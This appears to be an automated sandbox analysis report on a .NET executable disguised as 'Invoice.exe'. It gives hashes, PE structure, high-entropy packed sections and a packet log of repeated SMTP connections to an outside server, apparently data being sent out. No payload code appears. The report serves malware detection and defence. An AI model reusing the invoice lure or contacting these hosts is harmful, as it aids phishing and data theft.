TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Invoice.exe
File size:	841'728 bytes
MD5:	df0a67f2a0c162c5a5dee0a8fcd8ab22
SHA1:	07981693f5b38fa99a88aca0e13ba5b6022b1465
SHA256:	e62255f98543e0bb1abf017af13fd483e1382158021b7edde65fa55c1ad290cf
SHA512:	b62ea9a4710dfc855cfd47f2c0cb8787c9ea6b1159387431d1cc70b5989dd59086aaadd62e42fea9b21d28834b6ece20dc1715245762d026e48e315544529f75
SSDEEP:	12288:zPqnHvjNIrpf9rN/mc/CQw5PXdFPemY3kI26WE+34DO2IOxzV2SYm9nEix9H82rF:zyPjKr5BNDuXvfY0RfmIkzLNP5rJ
TLSH:	E905237173BC9267C6B49BF006A9952A07F7B45F1872E6CC5CE0208F66A4F41AF11B63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.+f..............0......4........... ........@.. .......................@............@................................

File Icon


Icon Hash:	49598b8999894929

Static PE Info

General

Entrypoint:	0x4cc0e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x662B154D [Fri Apr 26 02:45:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
cmp byte ptr [edi+38h], cl
pop edx
xor eax, 50374856h
xor al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+42h], al
cmp byte ptr [esp+esi+51h], dl
cmp byte ptr [ecx+4Fh], dl
inc esp
push ebp
inc ebp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcc094	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x311c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xca10c	0xca200	d431ed73779274bdae7e0e9c84e9785f	False	0.9420995670995671	data	7.965587512364022	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x311c	0x3200	27163d01d728135ab9227f3c5154baf8	False	0.90890625	data	7.686428286024459	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd2000	0xc	0x200	953e5c0a86edf0db63c018c3a7eb6081	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xce0c8	0x2d07	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9655591220612475
RT_GROUP_ICON	0xd0de0	0x14	data	1.05
RT_VERSION	0xd0e04	0x314	data	0.4543147208121827

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:42:10.909794092 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:10.909837961 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:10.909912109 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:10.920908928 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:10.920933008 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.200961113 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.201049089 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:11.204643965 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:11.204679012 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.205106020 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.279494047 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:11.324119091 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.517167091 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.517235041 CEST	443	49733	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:11.517312050 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:11.531915903 CEST	49733	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:12.619890928 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:12.827799082 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:12.827919960 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.089484930 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.089674950 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.297771931 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.297962904 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.506865025 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.507312059 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.722311020 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.722331047 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.722343922 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.722438097 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.746656895 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:13.955635071 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:13.961517096 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:14.169495106 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.170697927 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:14.379235983 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.383433104 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:14.546164989 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.546269894 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:14.546346903 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.549772024 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.549808025 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:14.632333994 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.681193113 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.708339930 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:14.812422991 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:14.812489033 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.813997030 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.814009905 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:14.814342976 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:14.907687902 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:14.916455984 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.916507959 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:14.916851997 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:14.948117018 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:15.139452934 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:15.139592886 CEST	443	49737	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:15.139650106 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:15.142301083 CEST	49737	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:15.153877974 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.154047012 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.361933947 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.362493038 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.362555981 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.362596989 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.362596989 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.570436954 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.570451021 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.570497990 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.570852995 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.623182058 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.756270885 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:15.963337898 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:15.963443995 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:16.239872932 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.240041018 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:16.447257042 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.447426081 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:16.655317068 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.656049013 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:16.872989893 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.873008013 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.873019934 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:16.873071909 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:16.874651909 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:17.081990004 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:17.084780931 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:17.291836023 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:17.292165041 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:17.499429941 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:17.499787092 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:17.708161116 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:17.708410025 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:17.915425062 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:17.915710926 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.157743931 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.157936096 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.364969969 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.365547895 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.365628958 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.365628958 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.365663052 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:18.572614908 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.572632074 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.572658062 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.572722912 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.573031902 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:18.623188972 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:24.883177996 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:24.883270979 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:24.883364916 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:24.886162996 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:24.886210918 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.150732040 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.150821924 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.152853012 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.152878046 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.153820992 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.201272011 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.246611118 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.288163900 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.477202892 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.477336884 CEST	443	49739	104.26.12.205	192.168.2.4
Apr 26, 2024 11:42:25.477567911 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.479888916 CEST	49739	443	192.168.2.4	104.26.12.205
Apr 26, 2024 11:42:25.915014029 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:26.122347116 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:26.123378038 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:26.400362968 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:26.400832891 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:26.608217001 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:26.608366013 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:26.817341089 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:26.817780972 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.032079935 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.032978058 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.033027887 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.033457041 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.034898043 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.242412090 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.245048046 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.452649117 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.452960014 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.660609007 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.660959005 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:27.869385958 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:27.870919943 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.078385115 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.078640938 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.315665960 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.315838099 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.523250103 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.523933887 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.523991108 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.524014950 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.524034977 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:28.731143951 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.731161118 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.731213093 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.731244087 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.731872082 CEST	587	49740	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:28.779448986 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:32.934742928 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:32.934784889 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:32.934864998 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:32.938107014 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:32.938127995 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.195108891 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.195184946 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:33.199687958 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:33.199704885 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.200030088 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.244131088 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:33.284135103 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.525007010 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.525181055 CEST	443	49747	104.26.13.205	192.168.2.4
Apr 26, 2024 11:42:33.525245905 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:33.529777050 CEST	49747	443	192.168.2.4	104.26.13.205
Apr 26, 2024 11:42:34.144565105 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:34.352085114 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:34.352191925 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:34.590336084 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:34.590563059 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:34.798264027 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:34.798676014 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:34.807167053 CEST	49740	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.007111073 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.007584095 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.222280025 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.222331047 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.222372055 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.222626925 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.225189924 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.432843924 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.435594082 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.643245935 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.643614054 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:35.851480007 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:35.853317976 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.063900948 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.064219952 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.271574974 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.274262905 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.518778086 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.519057035 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.726558924 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.727191925 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.727272034 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.727272034 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.727272034 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:42:36.934710979 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.934762001 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.934796095 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.934830904 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.935014009 CEST	587	49748	207.174.215.249	192.168.2.4
Apr 26, 2024 11:42:36.982584953 CEST	49748	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:49.650401115 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:49.761301041 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:49.857635021 CEST	587	49738	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:49.901562929 CEST	49738	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:49.968815088 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:49.968883991 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.012897015 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.220647097 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.220761061 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.413743019 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.482558966 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.482851028 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.499469042 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.510373116 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.690710068 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.690901041 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.718558073 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.721179008 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:50.899245024 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:50.929924965 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:51.063039064 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:51.111129999 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.211694002 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.212460041 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.342206955 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.426095963 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.426158905 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.426202059 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.426218987 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.427279949 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.427334070 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.427375078 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.427431107 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.429347992 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.429461002 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.550559998 CEST	587	49735	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.553127050 CEST	49735	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.637058973 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.637340069 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.640742064 CEST	49751	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.640777111 CEST	49750	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:43:52.848444939 CEST	587	49750	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.848588943 CEST	587	49751	207.174.215.249	192.168.2.4
Apr 26, 2024 11:43:52.848686934 CEST	49750	587	192.168.2.4	207.174.215.249
